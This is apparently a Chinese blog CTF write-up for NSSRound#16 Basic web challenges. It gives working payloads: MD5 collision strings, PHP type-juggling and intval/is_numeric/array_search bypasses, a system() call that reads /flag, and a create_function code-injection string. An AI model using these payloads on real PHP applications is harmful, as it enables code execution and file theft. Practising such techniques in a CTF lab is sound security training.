[NSSRound#16 Basic]Web

最新推荐文章于 2024-04-11 17:35:19 发布
最新推荐文章于 2024-04-11 17:35:19 发布
阅读量576 收藏 3
点赞数 2
分类专栏: CTF 文章标签: CTF WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/136116068
版权

1.RCE但是没有完全RCE

显示md5强比较,然后md5_3随便传

md5_1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&md5_2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2&md5_3=1

下一个目录3z_RC3.php

法一:可以不用shell,直接利用cmd实现rce

shell=urlencode

cmd=system($_POST[x]);

x=cat /flag

或者用array_pop函数,返回数组最后一个元素

2.了解过PHP特性吗

<?php
error_reporting(0);
highlight_file(__FILE__);
include("rce.php");
$checker_1 = FALSE;
$checker_2 = FALSE;
$checker_3 = FALSE;
$checker_4 = FALSE;
$num = $_GET['num'];
if (preg_match("/[0-9]/", $num)) {
    die("no!!");
}
if (intval($num)) {
    $checker_1 = TRUE;
}
if (isset($_POST['ctype']) && isset($_POST['is_num'])) {
    $ctype = strrev($_POST['ctype']);
    $is_num = strrev($_POST['is_num']);
    if (ctype_alpha($ctype) && is_numeric($is_num) && md5($ctype) == md5($is_num)) {
        $checker_2 = TRUE;
    }
}
$_114 = $_GET['114'];
$_514 = $_POST['514'];
if (isset($_114) && intval($_114) > 114514 && strlen($_114) <= 3) {
    if (!is_numeric($_514) && $_514 > 9999999) {
        $checker_3 = TRUE;
    }
}
$arr4y = $_POST['arr4y'];
if (is_array($arr4y)) {
    for ($i = 0; $i < count($arr4y); $i++) {
        if ($arr4y[$i] === "NSS") {
            die("no!");
        }
        $arr4y[$i] = intval($arr4y[$i]);
    }
    if (array_search("NSS", $arr4y) === 0) {
        $checker_4 = TRUE;
    }
}
if ($checker_1 && $checker_2 && $checker_3 && $checker_4) {
    echo $rce;
}

第一层,无数字intval绕过,用非空数组

num[]=a

第二层md5弱比较

纯字母QNKCDZO

纯数字240610708

注意会翻转,要倒着写

ctype=OZDCKNQ&is_num=807016042

第三层intval长度限制绕过,is_numeric绕过

114用科学计数法1e9

514用数字加字母绕过!is_numeric

114=1e9&514=99999999a

第四层array_search绕过

arr4y数组里面不能有NSS,但是NSS的键名要是0

测试发现,当键名和值都是0的时候,array_search匹配不到NSS也会返回键名

所以arr4y[]=0

arr4y[]=0

提示下一页是Rc3_function.php

create_function注入

shell传空内容,nss传1;}system("cat /f*");/*

nss=1;}system("cat /f*");/*&shell=

tao0845
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
## Visual Basic: 介绍、使用技巧和经典案例
04-21
Visual Basic(VB)是一种基于事件驱动的编程语言,最初由微软开发。它是一种易学易用的语言,主要用于快速开发图形用户界面(GUI)应用程序。VB具有直观的语法和强大的集成开发环境(IDE),使得开发者能够快速构建...
daacheng#PythonBasic#反转二叉树1
07-25
226.反转二叉树题目翻转一棵二叉树。输入输出分析递归新树的左子树,是旧树的右子树的反转树新树的右子树,是旧树的左子树的反转树迭代遍历所有节点,交换每个节点的左
[NSSRound#13 Basic] 刷题记录
rev1ve的博客
10-21 465
我们尝试随便修改下刚刚的session值,发现报错信息有key。那么我们随便注册一个登陆进去,想拿flag发现不是admin。回到拿flag处,bp抓包修改session值,得到flag。发现只能读出来数字,那么可以使用od命令,把它转换成八进制。发现不是admin,回到刚刚拿flag界面,发现有hint。依次找到,那么我们就可以跟着文章来,进行HTTP走私。打开题目,想注册admin发现不行(暗示很明显了)得到加密后字符串,回到拿flag页面bp抓包。提示了flag在根目录,我们尝试直接读取。
[NSSRound#17 Basic]WEB
qq_34942239的博客
02-14 291
看robots.txt密码先base32再base64得到md5加密的密文,在线解得到密码为Nsshint用16进制转字符串,提示新生赛遇到过是一个敲击码加密账号是ctfer,登录之后源码提示在F111n4l.php要求nss参数若比较等于732339662,但是不能是数字nss=732339662,1绕过。
[NSSRound#1 Basic]basic_check
m0_70819573的博客
03-06 173
扫后门,.git啥都没有,看了write up才知道可以用nikto扫发现可以用PUT方法上传文件。访问a.php输入指令找到flag.1.打开环境,毫无头绪。
[NSSRound#8 Basic]MyDoor
m0_70819573的博客
03-05 413
用base64读取index.php的源码,发现可以传参N_S.S进行命令执行,由于php的特性,在后端会被规范成N_S_S。1.打开环境,审计代码,一个file后门。所以用N[S.S传参。
[NSSRound#16 Basic]RCE但是没有完全RCE
Fab1an的博客
01-18 744
只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会先转换字符串的类型,再进行比较,而在比较时因为两个数都是以0e开头会被认为是科学计数法,0e后面加任何数在科学计数法中都是0,所以两数相等,cmd自成一个包含函数和参数的完整命令执行。再要绕waf很自然就想到用$_POST[1]来转接。就表示匹配字母a到字母z中的任意一个字符。第一个是md5强类型比较,用数组。都被过滤了,这时候可以用中括号。第二个是md5弱类型比较,那就把GET传的参数改为。最后就得到flag了。
[NSSRound#1 Basic]
ki10Moc的博客
08-03 506
看了本文会影响您一天的好心情的
NSSROUND#8[Basic]
Aiwin的博客
02-12 847
NSSROUND#8[Basic]
NSSRound#8 WEB部分
ph0ebus的博客
02-13 712
只做出来My系列两道题,记录一下学到的知识叭。
WebNSSRound#1-20 Basic 刷题记录(全)
uuzeray的博客
04-11 1740
3、之后执行content.innerHTML = data.message.content,发生报错,执行Error.prepareStackTrace,通过 callsite.getFunction()获取当前调用栈的函数,也就56-65这段的匿名函数,再callsite.getFunction()(),让这段匿名函数再次执行。1、插入了img标签,使得56-65这段匿名函数执行停止,去加载img外部引用,因为没有外部引用,所以触发img的error,执行js代码。提供应用的健康信息。
daacheng#PythonBasic#移动零1
07-25
示例:输入: [0,1,0,3,12]输出: [1,3,12,0,0]暴力法:两个指针,从第一个元素开始遍历数组,如果是0,就与下一个不为0的元素交换位置双指针
daacheng#PythonBasic#旋转数组1
07-25
第一步,反转整个数组 第二步,反转nums[:k] 第三步,反转nums[k:]
ClassSite.rar_WEB开发_Visual_Basic_
08-12
Asp.net2.0+Access开发的简单新闻发布系统,适合新手操练用 后台有新闻的管理功能,新闻的编辑。
vb仓库管理系统(可执行程序+源码+ 开题报告+ 答辩稿)【VB】.zip
06-04
vb仓库管理系统(可执行程序+源码+ 开题报告+ 答辩稿)【VB】
甘胺酸市场 - 全球产业规模、份额、趋势、机会和预测,按类型、应用、地区和竞争细分,2019-2029F.docx
06-04
甘胺酸市场 - 全球产业规模、份额、趋势、机会和预测,按类型、应用、地区和竞争细分,2019-2029F
cryptography-37.0.1-cp36-abi3-win_amd64.whl
最新发布
06-04
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
SMG2336N-VB一款N-Channel沟道SOT23的MOSFET晶体管参数介绍与应用说明
06-04
SOT23;N—Channel沟道,30V;6.5A;RDS(ON)=30mΩ@VGS=10V,VGS=20V;Vth=1.2~2.2V;
Web Service安全(一)——Basic验证
05-20
下面是一个使用 Basic 验证的 Web Service 的示例: ```xml targetNamespace="http://www.example.org/HelloWorld" xmlns="http://schemas.xmlsoap.org/wsdl/" xmlns:soap=...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值